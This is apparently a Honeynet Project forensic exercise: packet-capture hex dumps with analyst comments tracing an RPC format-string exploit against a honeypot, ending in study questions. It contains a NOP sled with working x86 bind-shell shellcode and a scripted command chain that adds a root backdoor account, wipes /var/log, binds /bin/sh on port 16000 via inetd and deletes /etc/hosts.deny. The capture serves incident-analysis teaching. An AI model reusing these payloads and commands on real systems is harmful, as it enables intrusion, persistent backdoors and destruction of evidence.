90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 31 C0 ..............1.
EB 7C 59 89 41 10 89 41 08 FE C0 89 41 04 89 C3 .|Y.A..A....A...
FE C0 89 01 B0 66 CD 80 B3 02 89 59 0C C6 41 0E .....f.....Y..A.
99 C6 41 08 10 89 49 04 80 41 04 0C 88 01 B0 66 ..A...I..A.....f
CD 80 B3 04 B0 66 CD 80 B3 05 30 C0 88 41 04 B0 .....f....0..A..
66 CD 80 89 CE 88 C3 31 C9 B0 3F CD 80 FE C1 B0 f......1..?.....
3F CD 80 FE C1 B0 3F CD 80 C7 06 2F 62 69 6E C7 ?.....?..../bin.
46 04 2F 73 68 41 30 C0 88 46 07 89 76 0C 8D 56 F./shA0..F..v..V
10 8D 4E 0C 89 F3 B0 0B CD 80 B0 01 CD 80 E8 7F ..N.............
FF FF FF 00 ....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-07:17:14.517554 207.19.5.25:710 -> 172.16.1.104:931
UDP TTL:49 TOS:0x0 ID:49145
Len: 1084
0C 72 54 F5 00 00 00 00 00 00 00 02 00 01 86 B8 .rT.............
00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 20 ...............
3A 32 3F ED 00 00 00 09 6C 6F 63 61 6C 68 6F 73 :2?.....localhos
74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 t...............
00 00 00 00 00 00 00 00 00 00 03 E7 18 F7 FF BF ................
18 F7 FF BF 19 F7 FF BF 19 F7 FF BF 1A F7 FF BF ................
1A F7 FF BF 1B F7 FF BF 1B F7 FF BF 25 38 78 25 ............%8x%
38 78 25 38 78 25 38 78 25 38 78 25 38 78 25 38 8x%8x%8x%8x%8x%8
78 25 38 78 25 38 78 25 32 33 36 78 25 6E 25 31 x%8x%8x%236x%n%1
33 37 78 25 6E 25 31 30 78 25 6E 25 31 39 32 78 37x%n%10x%n%192x
25 6E 90 90 90 90 90 90 90 90 90 90 90 90 90 90 %n..............
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 31 C0 ..............1.
EB 7C 59 89 41 10 89 41 08 FE C0 89 41 04 89 C3 .|Y.A..A....A...
FE C0 89 01 B0 66 CD 80 B3 02 89 59 0C C6 41 0E .....f.....Y..A.
99 C6 41 08 10 89 49 04 80 41 04 0C 88 01 B0 66 ..A...I..A.....f
CD 80 B3 04 B0 66 CD 80 B3 05 30 C0 88 41 04 B0 .....f....0..A..
66 CD 80 89 CE 88 C3 31 C9 B0 3F CD 80 FE C1 B0 f......1..?.....
3F CD 80 FE C1 B0 3F CD 80 C7 06 2F 62 69 6E C7 ?.....?..../bin.
46 04 2F 73 68 41 30 C0 88 46 07 89 76 0C 8D 56 F./shA0..F..v..V
10 8D 4E 0C 89 F3 B0 0B CD 80 B0 01 CD 80 E8 7F ..N.............
FF FF FF 00 ....

### The exploit is done. A shell was bound to port 39168. He

### now connects to this port and executes several commands.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-07:17:21.466595 207.19.5.25:2646 -> 172.16.1.104:39168
TCP TTL:49 TOS:0x0 ID:49963 DF
**S***** Seq: 0x6B9CD069 Ack: 0x0 Win: 0x7D78
TCP Options => MSS: 1460 SackOK TS: 98106716 0 NOP WS: 0
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-07:17:21.467540 207.19.5.25:2646 -> 172.16.1.104:39168
TCP TTL:241 TOS:0x0 ID:26191
****R*** Seq: 0x0 Ack: 0x0 Win: 0x0
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-07:17:21.468617 172.16.1.104:39168 -> 207.19.5.25:2646
TCP TTL:63 TOS:0x0 ID:48243 DF
**S***A* Seq: 0x4D5819B5 Ack: 0x6B9CD06A Win: 0x7D78
TCP Options => MSS: 1460 SackOK TS: 107932029 98106716 NOP WS: 0
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-07:17:21.613942 207.19.5.25:2646 -> 172.16.1.104:39168
TCP TTL:49 TOS:0x0 ID:49978 DF
******A* Seq: 0x6B9CD06A Ack: 0x4D5819B6 Win: 0x7D78
TCP Options => NOP NOP TS: 98106736 107932029

### Here we see the commands executed by bad guy. These commands
### appear to be scripted and NOT manually inputed. The script
### creates the following accouts (user: UID5000, sendmail: UID0)
### Notice the script deletes /var/log and adds a /bin/sh listening
### on port 16000
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-07:17:22.847098 207.19.5.25:2646 -> 172.16.1.104:39168
TCP TTL:49 TOS:0x0 ID:50108 DF
*****PA* Seq: 0x6B9CD06A Ack: 0x4D5819B6 Win: 0x7D78
TCP Options => NOP NOP TS: 98106837 107932029
65 63 68 6F 20 75 73 65 72 3A 78 3A 35 30 30 30 echo user:x:5000
3A 35 30 30 30 3A 2F 75 73 65 72 3A 2F 74 6D 70 :5000:/user:/tmp
3A 2F 62 69 6E 2F 62 61 73 68 20 3E 3E 20 2F 65 :/bin/bash >> /e
74 63 2F 70 61 73 73 77 64 3B 20 65 63 68 6F 20 tc/passwd; echo
75 73 65 72 3A 59 69 32 79 43 47 48 6F 30 77 4F user:Yi2yCGHo0wO
77 67 3A 31 30 38 38 34 3A 30 3A 39 39 39 39 39 wg:10884:0:99999
3A 37 3A 2D 31 3A 2D 31 3A 31 33 34 35 33 38 34 :7:-1:-1:1345384
31 32 20 3E 3E 20 2F 65 74 63 2F 73 68 61 64 6F 12 >> /etc/shado
77 3B 20 65 63 68 6F 20 73 65 6E 64 6D 61 69 6C w; echo sendmail
3A 3A 31 30 38 36 35 3A 30 3A 39 39 39 39 39 3A ::10865:0:99999:
37 3A 2D 31 3A 2D 31 3A 31 33 34 35 33 38 34 36 7:-1:-1:13453846
30 20 3E 3E 20 2F 65 74 63 2F 73 68 61 64 6F 77 0 >> /etc/shadow
3B 20 65 63 68 6F 20 73 65 6E 64 6D 61 69 6C 3A ; echo sendmail:
78 3A 30 3A 30 3A 3A 2F 72 6F 6F 74 3A 2F 62 69 x:0:0::/root:/bi
6E 2F 62 61 73 68 20 3E 3E 20 2F 65 74 63 2F 70 n/bash >> /etc/p
61 73 73 77 64 3B 20 70 77 63 6F 6E 76 3B 20 72 asswd; pwconv; r
6D 20 2D 72 66 20 2F 76 61 72 2F 6C 6F 67 3B 65 m -rf /var/log;e
63 68 6F 20 31 36 30 30 30 20 73 74 72 65 61 6D cho 16000 stream
20 74 63 70 20 6E 6F 77 61 69 74 20 72 6F 6F 74 tcp nowait root
20 2F 75 73 72 2F 73 62 69 6E 2F 74 63 70 64 20 /usr/sbin/tcpd
2F 62 69 6E 2F 73 68 20 3E 3E 20 2F 65 74 63 2F /bin/sh >> /etc/
69 6E 65 74 64 2E 63 6F 6E 66 3B 72 6D 20 2D 72 inetd.conf;rm -r
66 20 2F 65 74 63 2F 68 6F 73 74 73 2E 64 65 6E f /etc/hosts.den
79 3B 6B 69 6C 6C 61 6C 6C 20 2D 48 55 50 20 69 y;killall -HUP i
6E 65 74 64 3B 00 02 40 68 38 01 40 C4 9C 04 08 netd;..@h8.@....
84 9C 04 25 D6 9C 04 08 02 00 00 25 00 00 00 00 ...%.......%....
08 00 00 00 44 9C 04 08 44 00 00 00 00 00 00 00 ....D...D.......
00 00 00 00 00 00 00 00 00 00 00 00 4C FC FF BF ............L...
EE 9B 04 08 C0 00 00 25 44 05 00 40 01 00 00 00 .......%D..@....
00 00 00 00 53 00 00 00 03 00 00 00 68 FD FF BF ....S.......h...
4F FC FF BF 48 9C 04 08 41 9C 04 08 07 00 00 00 O...H...A.......
FF FF FF FF 79 0D 00 40 A3 84 02 40 68 38 01 40 ....y..@...@h8.@
E0 43 01 40 D3 64 00 00 0E 9B 02 40 6C F8 FF BF .C.@.d.....@l...
E6 81 00 40 D5 9A 02 40 D5 9A 02 40 02 14 00 40 ...@...@...@...@
80 F8 FF BF 02 14 00 40 88 F8 FF BF E6 81 00 40 .......@.......@
E1 13 00 40 D5 9A 02 40 68 38 01 40 0E 9B 02 40 ...@...@h8.@...@
A0 F8 FF BF E6 81 00 40 D5 9A 02 40 D5 9A 02 40 .......@...@...@
68 38 01 40 E0 43 01 40 23 38 00 00 C9 0E 00 40 h8.@.C.@#8.....@
00 00 00 00 A0 13 00 40 00 00 00 00 E0 43 01 40 .......@.....C.@
00 00 00 00 00 00 00 00 03 00 00 00 30 35 00 00 ............05..
01 00 00 00 00 00 64 20 00 00 00 00 00 00 00 00 ......d ........
A0 E2 01 40 53 03 00 00 D0 1F 02 40 70 AD 01 40 ...@S......@p..@
E0 43 01 40 03 00 00 00 50 46 01 40 01 00 00 00 .C.@....PF.@....
58 F8 73 20 FF FF FF FF F3 FF FF FF 00 00 00 00 X.s ............
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 54 FF FF BF ............T...
FF FF FF FF D0 FB 04 08 00 00 00 00 00 00 00 00 ................
00 00 00 00 05 00 00 00 01 00 00 00 98 FD FF BF ................
6F FD FF BF ED 9B 04 08 EB 9B 04 08 0E 00 00 00 o...............
FF FF FF FF FD A7 00 40 D0 43 01 40 C0 46 01 40 .......@.C.@.F.@
07 00 00 00 4E A7 00 40 EC 81 10 40 29 B9 0F 40 ....N..@...@)..@
C5 B8 0F 40 E0 43 01 40 A0 E2 01 40 FC 84 10 40 ...@.C.@...@...@
F3 57 02 40 A0 E2 01 40 50 F9 FF BF 70 A9 00 40 .W.@...@P...p..@
14 00 00 00 04 F9 FF BF C0 81 07 40 E0 43 01 40 ...........@.C.@
EE 9B 04 08 EC 81 10 40 50 F9 FF BF 1B 3A 03 40 .......@P....:.@
43 00 0F 40 00 00 00 00 00 00 00 00 47 45 53 2F C..@........GES/
6C 69 62 63 2E 6D 6F 00 EC 81 10 40 05 00 00 00 libc.mo....@....
74 FE FF BF E0 43 01 40 0F F9 FF BF B4 83 10 40 t....C.@.......@
B6 42 02 40 6F 00 01 40 05 00 00 00 00 F9 FF BF .B.@o..@........
04 F9 FF BF D6 B8 0F 40 EF B8 0F 40 00 00 00 00 .......@...@....
6C F9 FF BF 24 64 0E 40 C0 B8 0F 40 06 24 10 40 l...$d.@...@.$.@
05 00 00 00 EC 81 10 40 DD FB 04 08 96 61 0E 40 .......@.....a.@
DD FB 04 08 06 24 10 40 EC 81 10 40 60 AE 00 40 .....$.@...@`..@
74 FE FF BF D0 FB 04 08 05 00 00 00 00 00 00 00 t...............
00 00 00 00 E8 80 01 40 18 00 00 00 F4 17 00 40 .......@.......@
04 00 00 00 E8 80 01 40 00 3C 01 40 0C FA FF BF .......@.<.@....
08 FA FF BF 04 FA FF BF 00 3C 01 40 D4 80 01 40 .........<.@...@
00 00 00 00 14 08 00 40 D4 38 01 40 02 14 00 40 .......@.8.@...@
F4 02 00 40 80 87 04 08 80 87 04 08 24 FA FF BF ...@........$...
02 00 00 00 D0 1F 02 40 00 3C 01 40 15 BA 00 40 .......@.<.@...@
68 38 01 40 14 08 00 40 B0 41 00 40 01 00 00 00 h8.@...@.A.@....
0C FA FF BF 28 15 00 40 C8 02 00 00 00 00 00 00 ....(..@........
80 87 04 08 00 00 00 00 01 00 00 00 24 08 00 40 ............$..@
2C FA FF BF BB 75 00 40 00 50 01 40 B2 2F 00 00 ,....u.@.P.@./..
68 38 01 40 64 FB FF BF 0E 38 00 40 68 38 01 40 h8.@d....8.@h8.@
0C 22 00 40 0E 9B 02 40 18 FB FF BF C1 0A 03 40 .".@...@.......@
EC 81 10 40 CC FB FF BF EC 81 10 40 EC 81 10 40 ...@.......@...@
FC FB FF BF 10 FD FF BF 68 38 01 40 C1 0A 03 40 ........h8.@...@
EC 81 10 40 EC FB FF BF EC 81 10 40 EC 81 10 40 ...@.......@...@
1C FC FF BF 30 FD FF BF 08 FC FF BF 00 00 00 00 ....0...........
05 00 00 00 00 00 00 00 00 00 00 00 68 AC 03 40 ............h..@
00 00 00 00 00 00 00 00 28 FC FF BF 00 00 00 00 ........(.......
05 00 00 00 00 00 00 00 00 00 00 00 68 AC 03 40 ............h..@
00 00 00 00 00 00 00 00 0E 9B 02 40 9C FB FF BF ...........@....
E6 81 00 40 D5 9A 02 40 D5 9A 02 40 68 38 01 40 ...@...@...@h8.@
E0 43 01 40 05 68 00 00 90 E8 01 40 90 FB FF BF .C.@.h.....@....
20 00 00 00 14 FB FF BF 1A D1 0E 40 A8 FB 04 08 ..........@....
14 FA 04 08 20 00 00 00 20 61 00 00 00 00 00 00 .... ... a......
90 FB FF BF 00 00 00 00 0A C7 0E 40 90 0E 02 40 ...........@...@
12 06 00 00 D0 1F 02 40 70 AD 01 40 E0 43 01 40 .......@p..@.C.@
03 00 00 00 50 46 01 40 ....PF.@
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-07:17:22.851135 172.16.1.104:39168 -> 207.19.5.25:2646
TCP TTL:63 TOS:0x0 ID:48244 DF
******A* Seq: 0x4D5819B6 Ack: 0x6B9CD612 Win: 0x7C70
TCP Options => NOP NOP TS: 107932167 98106837
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-07:17:22.851231 207.19.5.25:2646 -> 172.16.1.104:39168
TCP TTL:49 TOS:0x0 ID:50109 DF
***F*PA* Seq: 0x6B9CD612 Ack: 0x4D5819B6 Win: 0x7D78
TCP Options => NOP NOP TS: 98106837 107932029
01 00 00 00 54 FB FF BF 90 0E 02 40 E4 45 01 40 ....T......@.E.@
AE C7 1F 0D D0 FB FF BF EC 81 10 40 EC 81 10 40 ...........@...@
90 01 05 08 90 01 05 08 90 01 00 00 EC 81 10 40 ...............@
90 FB FF BF 80 64 00 00 A8 FB FF BF A8 FB FF BF .....d..........
00 00 00 00 90 FB FF BF F0 11 02 40 D6 34 00 00 ...........@.4..
D0 1F 02 40 70 AD 01 40 E0 43 01 40 08 03 00 00 ...@p..@.C.@....
A9 46 00 00 A4 81 01 00 C1 0A 03 40 EC 81 10 40 .F.........@...@
CC FB FF BF EC 81 10 40 EC 81 10 40 FC FB FF BF .......@...@....
10 FD FF BF CA 3F 32 3A 00 00 00 00 05 00 00 00 .....?2:........
ED 9B 0A 40 FC FB FF BF FC FB FF BF 02 00 00 00 ...@............
90 FC FF BF 00 00 00 00 2C 79 0E 40 60 AE 00 40 ........,y.@`..@
74 FE FF BF FF FF FF FF 20 68 10 40 00 70 01 40 t....... h.@.p.@
90 FC FF BF 01 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 28 FC FF BF 00 00 00 00 ........(.......
05 00 00 00 00 00 00 00 00 00 00 00 68 AC 03 40 ............h..@
00 00 00 00 00 00 00 00 0E 9B 02 40 9C FB FF BF ...........@....
E6 81 00 40 D5 9A 02 40 D5 9A 02 40 68 38 01 40 ...@...@...@h8.@
E0 43 01 40 05 68 00 00 90 E8 01 40 90 FB FF BF .C.@.h.....@....
20 00 00 00 14 FB FF BF 1A D1 0E 40 A8 FB 04 08 ..........@....
14 FA 04 08 20 00 00 00 20 61 00 00 00 00 00 00 .... ... a......
90 FB FF BF 00 00 00 00 0A C7 0E 40 90 0E 02 40 ...........@...@
00 00 00 00 68 AC 03 40 00 00 00 00 00 00 00 00 ....h..@........
A7 9B 04 08 00 00 00 00 00 00 00 00 A4 54 02 40 .............T.@
3E 69 02 40 44 5F 02 40 30 85 04 08 84 34 AD FB >i.@D_.@0....4..
30 85 04 08 26 03 00 00 20 02 02 40 4B 05 00 00 0...&... ..@K...
D0 1F 02 40 70 AD 01 40 E0 43 01 40 03 00 00 00 ...@p..@.C.@....
EC 81 10 40 E4 E7 06 40 04 00 00 00 00 60 01 40 ...@...@.....`.@
0E 00 00 00 EC 81 10 40 00 60 01 40 90 01 05 08 .......@.`.@....
20 02 02 40 E0 43 01 40 24 FD FF BF C4 E8 06 40 ..@.C.@$......@
90 01 05 08 0E 60 01 40 00 00 01 00 00 00 00 00 .....`.@........
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 ........
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-07:17:22.853395 172.16.1.104:39168 -> 207.19.5.25:2646
TCP TTL:63 TOS:0x0 ID:48245 DF
******A* Seq: 0x4D5819B6 Ack: 0x6B9CD86B Win: 0x7A17
TCP Options => NOP NOP TS: 107932168 98106837
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

Attack completed. The unanswered questions are:

QUESTION 1: Can you name the FTP scanning tool that uses a half open SYN?
QUESTION 2: What does the FTP exploit achieve? Does it open a port, create
a shell, add a user?
QUESTION 3: Where in the RPC exploit code does it bind a shell
to port 39168?
QUESTION 4: Are the attacks related.

Do you have any further analysis you can add?

------- Honeynet Project, http://project.honeynet.org --------